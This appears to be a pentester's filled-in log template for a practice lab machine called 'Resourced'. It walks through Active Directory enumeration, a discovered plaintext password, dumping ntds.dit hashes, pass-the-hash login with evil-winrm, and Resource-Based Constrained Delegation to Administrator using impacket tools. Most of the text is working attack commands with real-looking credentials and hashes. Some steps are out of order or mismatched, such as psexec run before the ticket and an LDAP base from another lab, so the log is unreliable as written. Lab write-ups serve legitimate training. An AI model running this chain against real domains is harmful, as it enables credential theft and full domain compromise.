🧪 Pentest Log: {{date:2025-08-04}}

🔍 Target Information

• Machine Name: Resourced
• IP Address: 192.168.223.175
• Operating System: Windows

ip=192.168.223.175

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 53

dig any resourced.local @$ip

dig AXFR @$ip 

Port 135

rpcclient -U '' -N $ip

Port 139, 445

smbclient -L \\\\$ip\\

enum4linux -a $ip

found

V.Ventz:HotelCalifornia194!

Use bloodhound to enumerate AD

bloodhound-python -u "V.Ventz" -p 'HotelCalifornia194!' -d resourced.local -c all --zip -ns $ip

sudo bloodhound

Found L.Livingstone in the Remote Management Group

Login smbclient with the found credential, obtain ntds.dit and SYSTEM

../gosecretsdump_linux_v0.3.1 -ntds ntds.dit -system SYSTEM -out hashes

obtain all user hashes

Port 389, 636, 3268, 3269

ldapsearch -H ldap://$ip -x -s base namingcontexts

ldapsearch -H ldap://$ip -x -b"DC=hutch,DC=offsec" > ldap_dump.txt

Port 3389

Port 5985

💣 Exploitation / Foothold

📌 Vulnerability Summary

• Service / Port: 5985
• Vulnerability Type: N/A

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

evil-winrm -i $ip -u L.Livingstone -H '19a3a7550ce8c505c2d46b5e39d6f808'

🧬 Privilege Escalation

👤 Current Access

• User: L.Livingstone
• Groups: N/A
• Shell Type: evil-winrm

🔍 Enumeration

Bloodhoun

found

L.Livingstone has GenericAll privilege to RESOURCEDC.RESOURCED.LOCAL

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Resource-Based Constrained Delegation
• Target Binary/Service: N/A
• Reference / Source: N/A

🔧 Exploit Steps

• Setup

impacket-addcomputer resourced.local/l.livingstone -dc-ip $ip -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'attackersystem


- Smash to Administrator

sudo impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip $ip

sudo python3 ../rbcd.py -dc-ip $ip -t RESOURCEDC -f 'ATTACK' -hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced\\l.livingstone


impacket-getST -spn cifs/resourcedc.resourced.local resourced/attackersystem\$:'Summer2018!' -impersonate Administrator -dc-ip $ip


export KRB5CCNAME=Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache

• Smash to Administrator